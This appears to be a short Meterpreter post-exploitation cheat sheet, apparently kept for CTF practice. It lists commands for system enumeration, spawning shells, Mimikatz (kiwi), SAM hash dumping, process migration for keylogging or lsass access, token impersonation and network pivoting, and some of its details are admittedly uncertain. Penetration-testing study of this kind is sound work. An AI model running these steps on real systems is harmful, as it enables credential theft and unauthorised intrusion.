https://github.com/rapid7/meterpreter

Enumeration

sysinfo
Info about the system.

getenv
Get one or more environment variable values.

getuid
Get current user.

getprivs
Display current user privileges.

search -f flag.txt
Search a file on the machine.

File Transfer

upload
Upload a file or directory.

download
Download a file or directory.

Spawn Shell

shell
Spawn a shell.

load
powershell_shell
Spawn Powershell.

Spawn Mimikatz

privilege::debug
Ensure that current user has administrator privileges (the output should be [output '20' OK]). This indicates that debugging a process is possible.

>

load kiwi
Starts Mimikatz.

help kiwi
Show Mimikatz commands.

Attacks

hashdump
Dump hashes from Windows SAM base (for linux use module linux/gather/hashdump).

migrate 716
Migrate to another process.
Ex : Migrate to a word.exe and act like a keylogger.
Ex: Migrate to lsass.exe to run hashdump.

Impersonate

If the current user has SeDebugPrivilege and SeImpersonatePrivilege privileges enabled, we are able to impersonate another user.

load incognito
Load icognito module.

list_tokens -u
List Delegation Tokens available (not sure of the flag maybe -g).

impersonate_token "BUILTIN\Administrators"
Impersonate token.

To determine rights, Windows uses the Primary Token of the process and not the impersonated token. So we have to migrate to a process with correct permissions.

The safest to pick is services.exe.

migrate 668
Migrate to process 668.

rev2self
Revert to previous user.

Pivoting

When we have a meterpreter shell on a machine that has access to another network, we can use it to gain access to the 2nd network.

run autoroute -s [REMOTE_NETWORK]/24
Create a route via the host that we had access to.

run autoroute -p
Show added routes.